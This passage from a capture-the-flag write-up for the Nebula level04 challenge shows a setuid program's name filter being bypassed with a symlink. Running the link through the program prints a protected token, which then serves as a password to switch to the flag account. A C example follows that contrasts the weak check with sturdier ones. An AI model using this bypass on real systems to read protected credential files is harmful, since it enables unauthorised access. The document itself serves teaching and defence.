After analyzing it, we conclude that the program opens the file specified in the first argument, reads its contents, and writes them to the standard output (1 is the file descriptor for the standard output, or stdout, also defined as STDOUT_FILENO).
In the /home/flag04 directory we notice that there's a file named token:
level04@nebula:~$ ls -l /home/flag04
total 12
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04 37 2011-11-20 21:52 token

Could we use flag04 to print out the contents of token? As it turns out, flag04 will not allow us to dump the contents of files containing "token" in their name.
This challenge requires us to know about symlinks (short for symbolic links). Symlinks are Linux's equivalent of shortcuts. We can create a symlink using ln, and opening the resulting file is effectively the same as opening the original file, just under a different name. You can learn more about symlinks on Wikipedia or in ln's man page ("man ln").
Getting the token
Easily enough, we create a symlink for "token" with a different name, and run flag04 on it.

level04@nebula:~$ ln -s /home/flag04/token t
level04@nebula:~$ /home/flag04/flag04 t
06508b5e-8909-4f38-b630-fdb148a848a2

There's our token. As it turns out, the token is also the password for user flag04.
So let's get that flag :)
level04@nebula:~$ su flag04 -c getflag
Password:
You have successfully executed getflag on a target account
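To see why the filter fails and what a sturdier check looks like, here is an added example (not part of the original post or of flag04's source). It compares the name-only filter described above with a check on the resolved path and a check on the opened file itself; the function names and the temporary fixture are assumptions made for illustration.

```c
#define _XOPEN_SOURCE 700 /* realpath, mkdtemp, O_NOFOLLOW */
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Weak check, as the post describes it: inspects only the supplied name. */
int name_check_allows(const char *arg) { return strstr(arg, "token") == NULL; }

/* Same filter applied after symlinks are resolved; deny if unresolvable. */
int resolved_check_allows(const char *arg) {
    char real[PATH_MAX];
    if (realpath(arg, real) == NULL) return 0;
    return strstr(real, "token") == NULL;
}

/* Decide on the opened object, not its name: refuse a final-component symlink,
 * then require a regular file owned by the real (invoking) user. */
int open_for_invoker(const char *arg) {
    struct stat st;
    int fd = open(arg, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == getuid())
        return fd;
    close(fd);
    return -1;
}

/* Constructed fixture: <dir>/token (regular file) and <dir>/t -> token. */
int make_fixture(char *dir, char *file, char *lnk, size_t n) {
    if (mkdtemp(dir) == NULL) return -1;
    snprintf(file, n, "%s/token", dir);
    snprintf(lnk, n, "%s/t", dir);
    int fd = open(file, O_CREAT | O_WRONLY, 0600);
    if (fd < 0) return -1;
    close(fd);
    return symlink("token", lnk);
}

int main(void) {
    char dir[] = "/tmp/l04demoXXXXXX", file[PATH_MAX], lnk[PATH_MAX];
    if (make_fixture(dir, file, lnk, sizeof file) != 0) return 1;
    printf("name check allows t:     %d\n", name_check_allows(lnk));
    printf("resolved check allows t: %d\n", resolved_check_allows(lnk));
    printf("open_for_invoker(t):     %d\n", open_for_invoker(lnk));
    return 0;
}
```

Resolving the name first still leaves a window between the check and the open, which is why the last function checks the file descriptor it actually got. In a setuid program getuid() returns the caller's user ID, so a file owned by flag04 would be refused for level04 whatever it is called.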
~ Dmitry